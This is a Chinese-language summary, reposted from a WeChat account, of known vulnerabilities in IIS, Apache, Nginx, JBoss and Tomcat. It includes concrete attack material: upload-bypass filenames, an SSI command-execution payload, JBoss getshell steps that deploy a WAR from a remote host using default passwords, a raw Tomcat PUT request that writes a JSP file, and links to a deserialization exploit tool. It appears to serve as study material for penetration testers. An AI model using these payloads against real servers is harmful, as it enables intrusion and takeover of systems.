1. iis6.0 put上传

   iis server 在web服务扩展中开启了webdav，配置了可以写入的权限，造成任意文件上传。

2. iis6.0 iis7.0（iis7.5） 解析漏洞(可配合文件上传白名单限制)

   iis6.0(分号截断)  例如上传asp木马  可以通过 x.asp;.jpg来绕过

   iis6.0(在以*.asp命名的文件夹下所有的文件都会被解析成asp文件)  例如我们可以控制上传文件夹，就可以绕过限制image.asp/x.jpg x.jpg被解析成asp

   iis7.0或iis7.5在使FastCGI方式调用php时，在php.ini里设置cgi.fix_pathinfo=1URL时，在URL后面添加“/x.php”等字符时，该文件被iis当php文件代码解析

3. iis短文件解析

   描述：此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

   原理：IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。

   使用版本：

4. HTTP.SYS远程代码执行  MS15-034-系统崩溃 或配合（鸡肋）

   远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动，通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。Windows 7 、 Windows Server 2008 R2 、 Windows 8 、 Windows Server 2012 、 Windows 8.1 和 Windows Server 2012 R2等

5. RCE&CVE-2017-7269-Win2003_IIS6-直接获取WEB权限（只适用与iis6.0）

6. apache多后缀解析漏洞(可配合文件上传白名单限制)

   如果在apache中设置addhandler application/x-httpd-php .php（分布式配置文件） 那么，在有多个后缀的情况下，只要一个文件含有.php后缀的文件即将被识别成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析漏洞。

   成功解析

7. apache换行解析漏洞（CVE-2017-15715）

   其2.4.0~2.4.29版本中存在一个解析漏洞，在解析PHP时，1.phpx0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。

   注意将此处更改，不要更改错位置

   访问文件eval.php%0a,解析成功

8. Apache SSI 远程命令执行漏洞

   当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。

   使用SSI(Server Side Include)的html文件扩展名，SSI（Server Side Include)，通常称为"服务器端嵌入"或者叫"服务器端包含"，是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

   上传一个shell.shtml 内容 <!--#exec cmd="id" -->

   上传成功

   访问

   成功上传访问shell.shtml

9. JBoss 5.x/6.x 反序列化漏洞复现（CVE-2017-12149）

   该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。

   影响：Jboss 5.x和 Jboss 6.x

   检测：/invoker/readonly 若显示HTTP status 500，则说明漏洞可能存在

   利用(简单粗暴，不优雅。)：Jboss反序列化_CVE-2017-12149.jar

   修复：升级版本或不需要的http-invoker.sar组件,删除此组件

   下载：https://github.com/yunxu1/jboss-_CVE-2017-12149

1. JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)

   影响：Jboss 4.X

   检测：/invoker/JMXInvokerServlet访问若提示下载，则可能存在漏洞。

   利用：Jboss反序列化_CVE-2017-12149.jar

   修复：升级版本

   下载：https://github.com/yunxu1/jboss-_CVE-2017-12149

2. 案例2-JBoos-弱口令安全-4.X&5.X&6.X

   Jboss4.x及其之前的版本 console 管理路径为/jmx-console/和/web-console/，密码存储：/opt/jboss/jboss4/server/default/conf/props/jmx-console-users.properties

   Jboss5.x开始弃用了 web-console ，增加了admin-console，

   Jboss5.x/6.x版本console路径为/jmx-console/和/admin-console/，密码存储：jboss/server/default/conf/props/jmx-console-users.properties

3. JBoos 4.X 弱口令管理后台部署war包getshell

   CVE-2017-7504启动环境 弱口令：admin/admin

   a、访问：/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

   b、生成war包部署自己服务器上：http://test.xiaodi8.com/one.war

   c、找到void addURL()，在ParamValue填入我们远程的war包，点击invoke

   d、提示成功后，访问/one/one.jsp触发后门

4. JBoos 5/6.X 弱口令管理后台部署war包getshell

   CVE-2017-12149启动环境 弱口令：admin/vulhub

   a、Applications->Web Application (WAR)s->Add a new resource

   b、生成war包，上传，确定

   c、确定添加后，访问/one/one.jsp触发后门

5. Nginx解析漏洞( 该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞)

   由于nginx.conf配置导致nginx把以’.php’结尾的文件交给fastcgi处理

6. Nginx文件名逻辑漏洞 CVE-2013-4547:

   而存在CVE-2013-4547的情况下，我们请求`1.gif[0x20][0x00].php`，这个URI可以匹配上正则`.php$`，可以进入这个Location块；但进入后，Nginx却错误地认为请求的文件是`1.gif[0x20]`，就设置其为`SCRIPT_FILENAME`的值发送给fastcgi。

   影响版本：Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

   首先上传一个图片注意后缀空格

   修改成1.jpg[0x20][0x00].php

7. Tomcat-配置-弱口令&爆破:

   Tomcat存在后台管理，账号密码设置在conf/tomcat-users.xml

   可能存在的安全问题：弱口令或爆破(爆破采用数据包base64传递认证)

8. Tomcat-put方法任意文件写入漏洞：

   漏洞本质Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件：

   PUT /1.jsp/ HTTP/1.1

   Host: your-ip:8080

   Accept: */*

   Accept-Language: en

   User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

   Connection: close

   Content-Type: application/x-www-form-urlencoded

   Content-Length: 5

   shell

9. Tomcat AJP 任意文件读取/包含漏洞：

   由于 Tomcat AJP 协议中的一个缺陷，攻击者可以读取或包含 Tomcat 的 webapp 目录中的任何文件。例如，攻击者可以读取 webapp 配置文件或源代码。此外，如果目标Web应用程序具有文件上传功能，攻击者可以通过Ghostcat漏洞利用文件包含在目标主机上执行恶意代码。

   影响版本 Tomcat 6

   Tomcat 7系列  <7.0.100

   Tomcat 8系列 <8.5.51

   Tomcat 9 系列 <9.0.31

原文始发于微信公众号（是恒恒呐）：常见web中间件漏洞总结